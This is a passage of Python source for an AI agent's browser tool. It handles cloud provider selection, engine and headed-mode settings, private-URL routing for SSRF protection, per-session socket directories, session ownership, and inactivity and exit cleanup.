driving this branch. Third-party plugins are intentionally NOT reachable
|
|
from auto-detect — only via explicit ``browser.cloud_provider: <name>``.
|
|
Never raises (a failure must not poison the cache).
|
|
"""
|
|
try:
|
|
for cls in (BrowserUseProvider, BrowserbaseProvider):
|
|
fallback_provider = cls()
|
|
if fallback_provider.is_configured():
|
|
return fallback_provider
|
|
except Exception: # pragma: no cover - defensive: never poison cache
|
|
logger.debug("Cloud provider auto-detect failed", exc_info=True)
|
|
return None
|
|
|
|
|
|
def _resolve_cloud_provider_uncached() -> Optional[CloudBrowserProvider]:
|
|
"""Return the configured cloud browser provider, or None for local mode.
|
|
|
|
Reads ``browser.cloud_provider`` and pins the result in the cache only when
|
|
it is definitive (explicit ``local``/``camofox``, or a resolved provider).
|
|
Explicit selection routes through :mod:`agent.browser_registry` so
|
|
third-party plugins participate; auto-detect (only when no selection was
|
|
ever written) walks Browser Use then Browserbase. A transient None
|
|
(unreadable config, missing credentials) is NOT cached so it can self-heal.
|
|
"""
|
|
global _cached_cloud_provider, _cloud_provider_resolved
|
|
|
|
resolved: Optional[CloudBrowserProvider] = None
|
|
provider_key = None
|
|
try:
|
|
from hermes_cli.config import read_raw_config
|
|
browser_cfg = read_raw_config().get("browser", {})
|
|
if isinstance(browser_cfg, dict) and "cloud_provider" in browser_cfg:
|
|
provider_key = normalize_browser_cloud_provider(browser_cfg.get("cloud_provider"))
|
|
if provider_key in ("local", "camofox"):
|
|
# Camofox runs through the built-in browser tools, not a cloud provider.
|
|
_cached_cloud_provider = None
|
|
_cloud_provider_resolved = True
|
|
return None
|
|
if provider_key == "nous":
|
|
# Managed "Nous Subscription" is serviced by the Browser Use provider.
|
|
provider_key = "browser-use"
|
|
if provider_key:
|
|
resolved = _instantiate_explicit_cloud_provider(provider_key)
|
|
if resolved is None:
|
|
return None
|
|
except ValueError:
|
|
raise
|
|
except Exception as e:
|
|
# Config may be temporarily unreadable; still try auto-detect so
|
|
# env-based / managed-gateway credentials can resolve. Don't pin cache.
|
|
logger.debug("Could not read cloud_provider from config: %s", e)
|
|
|
|
if resolved is None and provider_key is None:
|
|
resolved = _autodetect_cloud_provider()
|
|
if resolved is None:
|
|
return None
|
|
|
|
_cached_cloud_provider = resolved
|
|
_cloud_provider_resolved = True
|
|
return _cached_cloud_provider
|
|
|
|
|
|
from hermes_constants import is_termux as _is_termux_environment
|
|
|
|
|
|
def _browser_install_hint() -> str:
|
|
if _is_termux_environment():
|
|
return "npm install -g agent-browser && agent-browser install"
|
|
return "npm install -g agent-browser && agent-browser install --with-deps"
|
|
|
|
|
|
# Sentinel _find_agent_browser returns/caches to mean "resolve via npx" rather
|
|
# than a concrete executable path. A named constant + predicate keep the six
|
|
# comparison sites (four here, plus hermes_cli/tools_config.py and
|
|
# hermes_cli/doctor.py) from drifting if the sentinel's exact spelling ever
|
|
# changes.
|
|
NPX_AGENT_BROWSER_SENTINEL = "npx agent-browser"
|
|
|
|
# Pinned to match scripts/install.sh / scripts/install.ps1's
|
|
# "agent-browser@^0.26.0" managed install so a git-clone install resolving
|
|
# agent-browser via bare npx gets the same version as a managed install,
|
|
# instead of floating latest with no integrity check. Update both together.
|
|
AGENT_BROWSER_NPX_SPEC = "agent-browser@^0.26.0"
|
|
|
|
|
|
def _is_npx_agent_browser_sentinel(browser_cmd: str) -> bool:
|
|
return browser_cmd.strip() == NPX_AGENT_BROWSER_SENTINEL
|
|
|
|
|
|
def _requires_real_termux_browser_install(browser_cmd: str) -> bool:
|
|
return _is_termux_environment() and _is_local_mode() and _is_npx_agent_browser_sentinel(browser_cmd)
|
|
|
|
|
|
def _termux_browser_install_error() -> str:
|
|
return (
|
|
"Local browser automation on Termux cannot rely on the bare npx fallback. "
|
|
f"Install agent-browser explicitly first: {_browser_install_hint()}"
|
|
)
|
|
|
|
|
|
def _is_local_mode() -> bool:
|
|
"""Return True when the browser tool will use a local browser backend."""
|
|
if _get_cdp_override_raw():
|
|
return False
|
|
return _get_cloud_provider() is None
|
|
|
|
|
|
def _is_local_backend() -> bool:
|
|
"""Return True when the browser runs locally AND the terminal is also local.
|
|
|
|
SSRF protection only matters when the browser can reach networks the user's
|
|
terminal cannot: cloud backends, and a local browser paired with a
|
|
containerized terminal (docker/modal/daytona/ssh/singularity). A CDP
|
|
override is never trusted as local (that Chrome may live off-host) and MUST
|
|
be checked before the Camofox short-circuit so Camofox + override still
|
|
fails the local check; ``_is_local_mode`` treats overrides the same way —
|
|
keep the two in agreement.
|
|
"""
|
|
if _get_cdp_override_raw():
|
|
return False
|
|
if _is_camofox_mode():
|
|
return True
|
|
if _get_cloud_provider() is not None:
|
|
return False
|
|
# Scope-aware: under gateway multiplexing the routed profile's terminal
|
|
# backend lives in the per-turn terminal scope, not the process env.
|
|
from tools.terminal_scope import terminal_env
|
|
|
|
terminal_backend = terminal_env("TERMINAL_ENV", "local").strip().lower()
|
|
return terminal_backend in ("local", "")
|
|
|
|
|
|
_auto_local_for_private_urls_resolved = False
|
|
_cached_auto_local_for_private_urls: bool = True
|
|
|
|
|
|
def _get_browser_engine() -> str:
|
|
"""Return the browser engine: ``auto`` (no ``--engine`` flag), ``lightpanda`` or ``chrome``.
|
|
|
|
``browser.engine`` first, then ``AGENT_BROWSER_ENGINE``, then ``auto``;
|
|
cached. Lightpanda is much faster on navigation but has no graphical
|
|
renderer (no screenshots).
|
|
"""
|
|
global _cached_browser_engine, _browser_engine_resolved
|
|
if _browser_engine_resolved:
|
|
return _cached_browser_engine
|
|
|
|
_browser_engine_resolved = True
|
|
# Config file takes priority; env var only if config didn't set a value.
|
|
_cached_browser_engine = _browser_cfg(
|
|
"engine", "auto",
|
|
lambda v: str(v).strip().lower() if v and str(v).strip() else "auto",
|
|
"browser.engine from config",
|
|
)
|
|
if _cached_browser_engine == "auto":
|
|
env_val = os.environ.get("AGENT_BROWSER_ENGINE", "").strip().lower()
|
|
if env_val:
|
|
_cached_browser_engine = env_val
|
|
|
|
# Validate: agent-browser only accepts "chrome" and "lightpanda".
|
|
_VALID_ENGINES = {"auto", "lightpanda", "chrome"}
|
|
if _cached_browser_engine not in _VALID_ENGINES:
|
|
logger.warning(
|
|
"Unknown browser engine %r (valid: %s), falling back to 'auto'",
|
|
_cached_browser_engine, ", ".join(sorted(_VALID_ENGINES)),
|
|
)
|
|
_cached_browser_engine = "auto"
|
|
|
|
return _cached_browser_engine
|
|
|
|
|
|
_cached_headed_mode: Optional[bool] = None
|
|
_headed_mode_resolved = False
|
|
|
|
|
|
def _is_headed_mode() -> bool:
|
|
"""Return True when the browser should launch in headed (visible) mode.
|
|
|
|
Reads ``config["browser"]["headed"]`` with ``AGENT_BROWSER_HEADED`` env
|
|
var as fallback. Result is cached after the first call.
|
|
"""
|
|
global _cached_headed_mode, _headed_mode_resolved
|
|
if _headed_mode_resolved:
|
|
return _cached_headed_mode # type: ignore[return-value]
|
|
|
|
_headed_mode_resolved = True
|
|
_cached_headed_mode = _browser_cfg(
|
|
"headed", False,
|
|
lambda v: False if v is None else str(v).strip().lower() in ("true", "1", "yes"),
|
|
"browser.headed from config",
|
|
)
|
|
if not _cached_headed_mode:
|
|
env_val = os.environ.get("AGENT_BROWSER_HEADED", "").strip()
|
|
if env_val and env_val.lower() in ("true", "1", "yes"):
|
|
_cached_headed_mode = True
|
|
|
|
return _cached_headed_mode
|
|
|
|
|
|
def _should_inject_engine(engine: str) -> bool:
|
|
"""Return True when the engine flag should be added to agent-browser commands.
|
|
|
|
Only inject ``--engine`` for non-cloud, non-camofox local sessions where
|
|
the engine is explicitly set (not ``auto``).
|
|
"""
|
|
if engine == "auto":
|
|
return False
|
|
if _is_camofox_mode():
|
|
return False
|
|
return _is_local_mode()
|
|
|
|
|
|
from tools.browser_tool_lightpanda_fallback import ( # noqa: F401
|
|
_using_lightpanda_engine,
|
|
lightpanda_engine_status,
|
|
_lightpanda_fallback_reason,
|
|
_needs_lightpanda_fallback,
|
|
_annotate_lightpanda_fallback,
|
|
_copy_fallback_warning,
|
|
_run_chrome_fallback_command,
|
|
_chrome_fallback_screenshot,
|
|
)
|
|
|
|
|
|
def _auto_local_for_private_urls() -> bool:
|
|
"""``browser.auto_local_for_private_urls`` (default True), cached for the process.
|
|
|
|
When on, ``browser_navigate`` routes private/loopback/LAN URLs to a local
|
|
Chromium sidecar even with a cloud provider configured; public URLs keep
|
|
using the cloud provider in the same conversation.
|
|
"""
|
|
global _auto_local_for_private_urls_resolved, _cached_auto_local_for_private_urls
|
|
if _auto_local_for_private_urls_resolved:
|
|
return _cached_auto_local_for_private_urls
|
|
|
|
_auto_local_for_private_urls_resolved = True
|
|
_cached_auto_local_for_private_urls = _browser_cfg(
|
|
"auto_local_for_private_urls", _cached_auto_local_for_private_urls, bool,
|
|
"auto_local_for_private_urls from config",
|
|
)
|
|
return _cached_auto_local_for_private_urls
|
|
|
|
|
|
def _use_real_profile() -> bool:
|
|
"""Return whether the user consented to real-profile local browsing.
|
|
|
|
Reads ``browser.use_real_profile`` (default False) on EVERY call — it is a
|
|
consent switch, so flipping it off must take effect without a restart, and
|
|
in a multiplexed gateway each profile's config must decide for itself.
|
|
The read is one YAML load per local session creation (not per command),
|
|
so there is no hot-path cost to keeping it uncached.
|
|
"""
|
|
return _browser_cfg("use_real_profile", False, bool, "use_real_profile from config")
|
|
|
|
|
|
# Session name for the single shared real-profile copy-browser. All consented
|
|
# local browsing attaches to this one agent-browser session so concurrent
|
|
# tasks reuse the same copy-browser instead of each launching a rival Chromium
|
|
# on the same copied user-data-dir.
|
|
_REAL_PROFILE_SESSION = "hermes-real-profile"
|
|
_real_profile_cdp_lock = threading.Lock()
|
|
_real_profile_cdp_cache: dict = {}
|
|
_real_profile_chrome_procs: list = [] # Popen handles of directly-launched real browsers
|
|
|
|
|
|
from tools.browser_tool_real_profile import ( # noqa: F401
|
|
_terminate_real_profile_chrome,
|
|
_cdp_http_ready,
|
|
_agent_browser_get_cdp,
|
|
_cdp_on_data_dir,
|
|
_agent_browser_close_session,
|
|
_REAL_PROFILE_CHROME_FLAGS,
|
|
_real_profile_unsupported_reason,
|
|
_real_profile_snapshot_error,
|
|
_launch_real_profile_chrome,
|
|
_attach_agent_browser_to_real_profile,
|
|
_real_profile_cdp,
|
|
)
|
|
|
|
|
|
def _agent_browser_argv(browser_cmd: str) -> list:
|
|
"""Command prefix to invoke agent-browser (concrete binary or npx sentinel).
|
|
|
|
Concrete executable paths stay a single argv item (spaces intact); only the
|
|
synthetic npx sentinel expands. npx is resolved through the same
|
|
PATH + extended-PATH cascade ``_find_agent_browser`` uses — a bare
|
|
``shutil.which("npx")`` would let a broken system npx shadow a healthy
|
|
Hermes-managed one. If npx isn't found at all (Termux, bare container) the
|
|
bare name is used so Popen raises a readable ``FileNotFoundError: 'npx'``.
|
|
``--ignore-scripts``: AGENT_BROWSER_NPX_SPEC is a floating range, not an
|
|
exact pin — a compromised future patch must not run install-time scripts.
|
|
"""
|
|
if _is_npx_agent_browser_sentinel(browser_cmd):
|
|
_npx_bin = _resolve_npx_bin() or "npx"
|
|
return [_npx_bin, "--ignore-scripts", "--prefer-offline", "-y", AGENT_BROWSER_NPX_SPEC]
|
|
return [browser_cmd]
|
|
|
|
|
|
def _prepare_session_socket_dir(session_name: str) -> str:
|
|
"""Create the per-session agent-browser socket dir and claim it with our PID.
|
|
|
|
Each session gets its own dir so parallel workers don't fight over the
|
|
default socket path ("Failed to create socket directory: Permission
|
|
denied"). The owner_pid file is written BEFORE first use: another hermes
|
|
process's orphan reaper rmtree's any agent-browser-* dir in the shared
|
|
tmpdir that carries no live owner, which would delete this one mid-command.
|
|
"""
|
|
socket_dir = os.path.join(_socket_safe_tmpdir(), f"agent-browser-{session_name}")
|
|
os.makedirs(socket_dir, mode=0o700, exist_ok=True)
|
|
_write_owner_pid(socket_dir, session_name)
|
|
return socket_dir
|
|
|
|
|
|
def _agent_browser_command_env(socket_dir: str) -> Dict[str, str]:
|
|
"""Credential-scrubbed env for one agent-browser command.
|
|
|
|
Adds the discovery-time PATH fallbacks, the session socket dir, and the
|
|
daemon-side idle self-termination (``AGENT_BROWSER_IDLE_TIMEOUT_MS``,
|
|
agent-browser 0.24+) mirroring the Python-side inactivity janitor —
|
|
unless the user set the idle timeout explicitly.
|
|
"""
|
|
env = _build_browser_env()
|
|
env["PATH"] = _merge_browser_path(env.get("PATH", ""))
|
|
env["AGENT_BROWSER_SOCKET_DIR"] = socket_dir
|
|
if "AGENT_BROWSER_IDLE_TIMEOUT_MS" not in env:
|
|
env["AGENT_BROWSER_IDLE_TIMEOUT_MS"] = str(BROWSER_SESSION_INACTIVITY_TIMEOUT * 1000)
|
|
return env
|
|
|
|
|
|
def _popen_agent_browser(argv: List[str], env: Dict[str, str], socket_dir: str, tag: str) -> "subprocess.Popen":
|
|
"""Spawn agent-browser with stdout/stderr redirected to ``socket_dir/_stdout_<tag>``.
|
|
|
|
Temp files instead of pipes: the CLI forks a background daemon that inherits
|
|
its fds, so with pipes ``communicate()`` never sees EOF until the timeout.
|
|
Windows: CREATE_NO_WINDOW only (NOT CREATE_NEW_PROCESS_GROUP, which on
|
|
Python 3.11 cancels asyncio's running loop task and surfaces as
|
|
KeyboardInterrupt in the CLI), STARTF_USESTDHANDLES so CreateProcess hands
|
|
the child ONLY our three handles (leaked parent console handles make the
|
|
Rust binary's daemon grandchild die silently), close_fds=True for the rest.
|
|
Returns the Popen; the caller reads/unlinks the two files.
|
|
"""
|
|
stdout_path = os.path.join(socket_dir, f"_stdout_{tag}")
|
|
stderr_path = os.path.join(socket_dir, f"_stderr_{tag}")
|
|
stdout_fd = os.open(stdout_path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
|
|
stderr_fd = os.open(stderr_path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
|
|
try:
|
|
_popen_extra: dict = {}
|
|
if os.name == "nt":
|
|
_popen_extra["creationflags"] = windows_hide_flags()
|
|
_popen_extra["close_fds"] = True
|
|
_si = subprocess.STARTUPINFO()
|
|
_si.dwFlags |= subprocess.STARTF_USESTDHANDLES
|
|
_popen_extra["startupinfo"] = _si
|
|
return subprocess.Popen(
|
|
argv, stdout=stdout_fd, stderr=stderr_fd,
|
|
stdin=subprocess.DEVNULL, env=env, **_popen_extra,
|
|
)
|
|
finally:
|
|
os.close(stdout_fd)
|
|
os.close(stderr_fd)
|
|
|
|
|
|
def _url_is_private(url: str) -> bool:
|
|
"""Return True when the URL's host resolves to a private/LAN/loopback address.
|
|
|
|
Reuses ``tools.url_safety.is_safe_url`` as the oracle — if the SSRF check
|
|
would reject the URL, we treat it as "private" for routing purposes. DNS
|
|
resolution failures are treated as NOT private (fall through to whatever
|
|
backend is configured, which will surface the DNS error naturally).
|
|
"""
|
|
try:
|
|
# is_safe_url returns False for private/loopback/link-local/CGNAT AND
|
|
# for DNS failures. We only want the private-network case here, so
|
|
# we parse + check the host shape as a DNS-failure sieve first.
|
|
from urllib.parse import urlparse
|
|
import ipaddress
|
|
import socket
|
|
parsed = urlparse(url)
|
|
hostname = (parsed.hostname or "").strip().lower().rstrip(".")
|
|
if not hostname:
|
|
return False
|
|
# Literal IP → check directly
|
|
try:
|
|
ip = ipaddress.ip_address(hostname)
|
|
return (
|
|
ip.is_private
|
|
or ip.is_loopback
|
|
or ip.is_link_local
|
|
# 172.16.0.0/12: only covered by ip.is_private on Python
|
|
# ≥3.11 (bpo-40791). Explicit check keeps 3.10 runtimes
|
|
# routing these to the local sidecar correctly.
|
|
or ip in ipaddress.ip_network("172.16.0.0/12")
|
|
or ip in ipaddress.ip_network("100.64.0.0/10")
|
|
)
|
|
except ValueError:
|
|
pass
|
|
# Hostname — must resolve to confirm it's private (bare "localhost"
|
|
# resolves to 127.0.0.1 via /etc/hosts). Short-circuit on obvious
|
|
# names to avoid a DNS hop.
|
|
if hostname in {"localhost",} or hostname.endswith(".localhost"):
|
|
return True
|
|
if hostname.endswith(".local") or hostname.endswith(".lan") or hostname.endswith(".internal"):
|
|
return True
|
|
try:
|
|
addr_info = socket.getaddrinfo(hostname, None, socket.AF_UNSPEC, socket.SOCK_STREAM)
|
|
except socket.gaierror:
|
|
return False # DNS fail → not private, let the normal path fail
|
|
for _, _, _, _, sockaddr in addr_info:
|
|
try:
|
|
ip = ipaddress.ip_address(sockaddr[0])
|
|
except ValueError:
|
|
continue
|
|
if (
|
|
ip.is_private
|
|
or ip.is_loopback
|
|
or ip.is_link_local
|
|
or ip in ipaddress.ip_network("100.64.0.0/10")
|
|
):
|
|
return True
|
|
return False
|
|
except Exception as exc:
|
|
logger.debug("URL-privacy check failed for %s: %s", url, exc)
|
|
return False
|
|
|
|
|
|
def _navigation_session_key(task_id: str, url: str) -> str:
|
|
"""Pick the session key that should handle ``url`` for ``task_id``.
|
|
|
|
Returns ``f"{task_id}::local"`` (hybrid routing: a local Chromium sidecar
|
|
while the cloud session keeps serving public URLs) only when ALL hold: a
|
|
cloud provider is configured, ``browser.auto_local_for_private_urls`` is
|
|
on (default), the URL resolves to a private/LAN/loopback address, no CDP
|
|
override is active (it owns the whole session), and Camofox is off (already
|
|
local-only). Otherwise the bare task_id.
|
|
"""
|
|
if task_id is None:
|
|
task_id = "default"
|
|
if _get_cdp_override_raw():
|
|
return task_id
|
|
if _is_camofox_mode():
|
|
return task_id
|
|
if _get_cloud_provider() is None:
|
|
return task_id
|
|
if not _auto_local_for_private_urls():
|
|
return task_id
|
|
if not _url_is_private(url):
|
|
return task_id
|
|
return f"{task_id}{_LOCAL_SUFFIX}"
|
|
|
|
|
|
def _is_local_sidecar_key(session_key: str) -> bool:
|
|
"""Return True when ``session_key`` is a hybrid-routing local sidecar."""
|
|
return session_key.endswith(_LOCAL_SUFFIX)
|
|
|
|
|
|
def _bare_task_id_for_session_key(session_key: str) -> str:
|
|
"""Return the owning bare task id for an opaque browser session key."""
|
|
if _is_local_sidecar_key(session_key):
|
|
return session_key[: -len(_LOCAL_SUFFIX)]
|
|
return session_key
|
|
|
|
|
|
def _session_info_owned_by_task(session_info: Dict[str, Any], task_id: str, session_key: str) -> bool:
|
|
"""Return whether ``session_info`` still belongs to ``task_id``/``session_key``.
|
|
|
|
Sessions created by current code carry explicit ownership metadata. Treat
|
|
older in-memory entries without those fields as valid for hot-reload/test
|
|
compatibility, but reject any explicit mismatch before a non-navigation
|
|
tool can act on the wrong tab/session.
|
|
"""
|
|
owner = session_info.get("owner_task_id")
|
|
key = session_info.get("session_key")
|
|
return (owner is None or owner == task_id) and (key is None or key == session_key)
|
|
|
|
|
|
def _last_session_key(task_id: str) -> str:
|
|
"""Session key a non-nav tool must use: the one that served the task's last navigation.
|
|
|
|
If that session was cleaned up or its ownership metadata no longer matches,
|
|
fail closed by dropping the stale binding rather than recreating or mutating
|
|
the wrong browser.
|
|
"""
|
|
if task_id is None:
|
|
task_id = "default"
|
|
recorded_key = _last_active_session_key.get(task_id)
|
|
if not recorded_key:
|
|
return task_id
|
|
with _cleanup_lock:
|
|
session_info = _active_sessions.get(recorded_key)
|
|
if session_info and _session_info_owned_by_task(session_info, task_id, recorded_key):
|
|
return recorded_key
|
|
_last_active_session_key.pop(task_id, None)
|
|
logger.debug(
|
|
"browser session ownership: dropping stale/mismatched last-active binding %s -> %s",
|
|
task_id,
|
|
recorded_key,
|
|
)
|
|
return task_id
|
|
|
|
|
|
def _allow_private_urls() -> bool:
|
|
"""Return whether the browser is allowed to navigate to private/internal addresses.
|
|
|
|
Reads ``config["browser"]["allow_private_urls"]``. Single-profile calls
|
|
cache the result for the process lifetime; multiplexed profile turns resolve
|
|
their context-local config on each call. Defaults to ``False`` (SSRF
|
|
protection active).
|
|
"""
|
|
global _cached_allow_private_urls, _allow_private_urls_resolved
|
|
|
|
# The profile multiplexer scopes config with a ContextVar while sharing
|
|
# this module. Never reuse another profile's private-network opt-out.
|
|
if get_hermes_home_override() is not None:
|
|
return _resolve_allow_private_urls()
|
|
|
|
if _allow_private_urls_resolved:
|
|
return _cached_allow_private_urls
|
|
|
|
_allow_private_urls_resolved = True
|
|
_cached_allow_private_urls = _resolve_allow_private_urls()
|
|
return _cached_allow_private_urls
|
|
|
|
|
|
def _resolve_allow_private_urls() -> bool:
|
|
"""Read the browser private-URL toggle from the active config scope."""
|
|
return _browser_cfg(
|
|
"allow_private_urls", False,
|
|
lambda v: is_truthy_value(v, default=False),
|
|
"allow_private_urls from config",
|
|
)
|
|
|
|
|
|
def _socket_safe_tmpdir() -> str:
|
|
"""Short temp dir for Unix domain sockets.
|
|
|
|
macOS ``TMPDIR`` (``/var/folders/.../T/``) plus ``agent-browser-hermes_…``
|
|
exceeds the 104-byte ``AF_UNIX`` path limit ("Failed to create socket
|
|
directory", silent screenshot failures), so ``/tmp`` is used there.
|
|
"""
|
|
if sys.platform == "darwin":
|
|
return "/tmp"
|
|
return tempfile.gettempdir()
|
|
|
|
|
|
# Active sessions keyed by "session key": the bare task_id, or f"{task_id}::local"
|
|
# for a hybrid-routing local sidecar. The key is opaque to _run_browser_command /
|
|
# cleanup_browser. Values: session_name (always), bb_session_id + cdp_url (cloud).
|
|
_active_sessions: Dict[str, Dict[str, Any]] = {}
|
|
_recording_sessions: set = set() # session_keys with active recordings
|
|
|
|
# Most recent session_key per task_id, set by browser_navigate() and read by every
|
|
# non-nav tool so click/snapshot land in the session that served the last
|
|
# navigation (otherwise a localhost sidecar task would fall back to the cloud session).
|
|
_last_active_session_key: Dict[str, str] = {}
|
|
_LOCAL_SUFFIX = "::local"
|
|
|
|
# Flag to track if cleanup has been done
|
|
_cleanup_done = False
|
|
|
|
# =============================================================================
|
|
# Inactivity Timeout Configuration
|
|
# =============================================================================
|
|
|
|
# Session inactivity timeout (seconds) - cleanup if no activity for this long.
|
|
# config.yaml is authoritative; BROWSER_INACTIVITY_TIMEOUT remains a legacy
|
|
# fallback so old deployments keep working if they have not migrated yet.
|
|
DEFAULT_SESSION_INACTIVITY_TIMEOUT = int(
|
|
DEFAULT_CONFIG.get("browser", {}).get("inactivity_timeout", 120)
|
|
)
|
|
|
|
|
|
def _get_session_inactivity_timeout() -> int:
|
|
env_default = env_int("BROWSER_INACTIVITY_TIMEOUT", DEFAULT_SESSION_INACTIVITY_TIMEOUT)
|
|
return _browser_cfg(
|
|
"inactivity_timeout", env_default,
|
|
lambda v: env_default if v is None else max(int(v), 30), # 30s floor: no instant reaping
|
|
"inactivity_timeout from config",
|
|
)
|
|
|
|
|
|
BROWSER_SESSION_INACTIVITY_TIMEOUT = _get_session_inactivity_timeout()
|
|
|
|
# How often the cleanup thread re-runs the orphan reaper (a startup-only reap
|
|
# can never recover from a leak that appears after boot in a long-lived process).
|
|
BROWSER_ORPHAN_REAP_INTERVAL = 300 # seconds
|
|
|
|
# Idle ceiling for a daemon whose owner process is alive but which fell out of
|
|
# its in-memory tracking — owner-alive alone would make it immortal. A large
|
|
# multiple of the inactivity timeout so a legitimately busy session is never touched.
|
|
BROWSER_ORPHAN_GRACE_SECONDS = max(3600, BROWSER_SESSION_INACTIVITY_TIMEOUT * 20)
|
|
|
|
_session_last_activity: Dict[str, float] = {}
|
|
# Owner Hermes home per session: the janitor is one process-global thread with
|
|
# no profile scope of its own, so each teardown must re-enter the OWNING
|
|
# profile's scope (copy_context at spawn would pin the first profile's secrets
|
|
# onto every other profile's teardown).
|
|
_session_owner_homes: Dict[str, str] = {}
|
|
# Consecutive janitor cleanup failures per session; force-reaped after MAX_INACTIVITY_CLEANUP_FAILURES.
|
|
_cleanup_failures: Dict[str, int] = {}
|
|
MAX_INACTIVITY_CLEANUP_FAILURES = 3
|
|
|
|
# Session keys flagged suspect after a command timeout. Written by
|
|
# _BrowserSessionBackend.mark_suspect (a single GIL-atomic dict write — must stay
|
|
# cheap and lock-free per the SuspectableBackend contract); consumed by
|
|
# ensure_healthy() at next use, which recycles the session.
|
|
_suspect_browser_sessions: Dict[str, str] = {}
|
|
|
|
|
|
class _BrowserSessionBackend:
|
|
"""``agent.deadline.SuspectableBackend`` adapter for one cached session key.
|
|
|
|
A thin stateless view over ``_active_sessions[key]`` + its daemon. The
|
|
timeout path calls ``mark_suspect`` inline; ``ensure_healthy`` runs at the
|
|
top of ``_get_session_info`` — the single choke point every command passes
|
|
through before reusing a cached session.
|
|
"""
|
|
|
|
__slots__ = ("_session_key",)
|
|
|
|
def __init__(self, session_key: str) -> None:
|
|
self._session_key = session_key
|
|
|
|
def mark_suspect(self, reason: str) -> None:
|
|
"""Flag the cached session as possibly poisoned.
|
|
|
|
MUST stay cheap, non-blocking and lock-free (it runs inline on the
|
|
timed-out caller's thread); all recycle work is deferred to ``ensure_healthy``.
|
|
"""
|
|
_suspect_browser_sessions[self._session_key] = reason
|
|
|
|
def ensure_healthy(self) -> bool:
|
|
"""Recycle the session when a prior timeout marked it suspect.
|
|
|
|
True when safe to reuse; False after tearing down a suspect session
|
|
(caller creates a fresh one). The flag is popped BEFORE teardown: the
|
|
``close`` re-enters ``_get_session_info`` and must not recurse into
|
|
another recycle.
|
|
"""
|
|
reason = _suspect_browser_sessions.pop(self._session_key, None)
|
|
if reason is None:
|
|
return True
|
|
logger.info(
|
|
"Recycling suspect browser session %s before reuse (%s)",
|
|
self._session_key, reason,
|
|
)
|
|
try:
|
|
_cleanup_single_browser_session(self._session_key)
|
|
except Exception:
|
|
logger.warning(
|
|
"Teardown of suspect browser session %s failed; a fresh "
|
|
"session will be created anyway", self._session_key,
|
|
exc_info=True,
|
|
)
|
|
return False
|
|
|
|
|
|
def _browser_session_backend(session_key: str) -> _BrowserSessionBackend:
|
|
"""Return the SuspectableBackend adapter for ``session_key``."""
|
|
return _BrowserSessionBackend(session_key)
|
|
|
|
# Background cleanup thread state
|
|
_cleanup_thread = None
|
|
_cleanup_running = False
|
|
# Protects _session_last_activity AND _active_sessions for thread safety
|
|
# (subagents run concurrently via ThreadPoolExecutor)
|
|
_cleanup_lock = threading.Lock()
|
|
|
|
|
|
def _session_expiry_timestamp(session_info: Dict[str, Any]) -> Optional[float]:
|
|
"""Return a provider-authoritative session expiry as epoch seconds.
|
|
|
|
Cloud providers may omit ``expires_at``. Unknown or malformed values are
|
|
therefore treated as having no known expiry, preserving the existing
|
|
lifecycle for local browsers and providers without an expiry contract.
|
|
"""
|
|
value = session_info.get("expires_at")
|
|
if isinstance(value, (int, float)) and not isinstance(value, bool):
|
|
return float(value)
|
|
if not isinstance(value, str) or not value.strip():
|
|
return None
|
|
|
|
normalized = value.strip()
|
|
if normalized.endswith(("Z", "z")):
|
|
normalized = f"{normalized[:-1]}+00:00"
|
|
try:
|
|
parsed = datetime.fromisoformat(normalized)
|
|
except ValueError:
|
|
logger.warning("Ignoring invalid cloud browser session expiry timestamp")
|
|
return None
|
|
if parsed.tzinfo is None:
|
|
parsed = parsed.replace(tzinfo=timezone.utc)
|
|
return parsed.timestamp()
|
|
|
|
|
|
def _session_has_expired(
|
|
session_info: Dict[str, Any], *, now: Optional[float] = None
|
|
) -> bool:
|
|
"""Return whether a cached browser session crossed its provider deadline."""
|
|
expires_at = _session_expiry_timestamp(session_info)
|
|
if expires_at is None:
|
|
return False
|
|
return (time.time() if now is None else now) >= expires_at
|
|
|
|
|
|
def _emergency_cleanup_all_sessions():
|
|
"""
|
|
Emergency cleanup of all active browser sessions.
|
|
Called on process exit or interrupt to prevent orphaned sessions.
|
|
|
|
Also runs the orphan reaper to clean up daemons left behind by previously
|
|
crashed hermes processes — this way every clean hermes exit sweeps
|
|
accumulated orphans, not just ones that actively used the browser tool.
|
|
"""
|
|
global _cleanup_done
|
|
if _cleanup_done:
|
|
return
|
|
_cleanup_done = True
|
|
|
|
# Clean up this process's own sessions first, so their owner_pid files
|
|
# are removed before the reaper scans.
|
|
# Real-profile Chrome processes are launched directly (not by
|
|
# agent-browser), so the session cleanup below never reaps them.
|
|
try:
|
|
_terminate_real_profile_chrome()
|
|
except Exception as e:
|
|
logger.debug("Real-profile chrome cleanup on exit failed: %s", e)
|
|
if _active_sessions:
|
|
logger.info("Emergency cleanup: closing %s active session(s)...",
|
|
len(_active_sessions))
|
|
try:
|
|
cleanup_all_browsers()
|
|
except Exception as e:
|
|
logger.error("Emergency cleanup error: %s", e)
|
|
finally:
|
|
with _cleanup_lock:
|
|
_active_sessions.clear()
|
|
_session_last_activity.clear()
|
|
_session_owner_homes.clear()
|
|
_cleanup_failures.clear()
|
|
_recording_sessions.clear()
|
|
|
|
# Lightpanda servers (Browser Use mode) are processes we spawned; the
|
|
# session cleanup above stops the tracked ones, this catches any that
|
|
# fell out of ``_active_sessions``.
|
|
try:
|
|
from tools.browser_lightpanda import stop_all_lightpanda
|
|
|
|
stop_all_lightpanda()
|
|
except Exception as e:
|
|
logger.debug("Lightpanda cleanup on exit failed: %s", e)
|
|
|
|
# Sweep orphans from other crashed hermes processes. Safe even if we
|
|
# never used the browser — uses owner_pid liveness to avoid reaping
|
|
# daemons owned by other live hermes processes.
|
|
try:
|
|
_reap_orphaned_browser_sessions()
|
|
except Exception as e:
|
|
logger.debug("Orphan reap on exit failed: %s", e)
|
|
|
|
|
|
# atexit only — NO SIGINT/SIGTERM handlers calling sys.exit(): a SystemExit
|
|
# raised inside a prompt_toolkit key-binding callback corrupts the coroutine
|
|
# state and makes the process unkillable. atexit runs on any normal exit.
|
|
atexit.register(_emergency_cleanup_all_sessions)
|
|
|
|
|
|
# =============================================================================
|
|
# Inactivity Cleanup Functions
|
|
# =============================================================================
|
|
|
|
@contextlib.contextmanager
|
|
def _session_owner_scope(task_id: str):
|
|
"""Run under the Hermes home + secret scope owning ``task_id``'s session (no-op if unrecorded).
|
|
|
|
The janitor thread is process-global, so each teardown must re-enter its
|
|
OWN profile's scope rather than inherit the spawning profile's; never falls
|
|
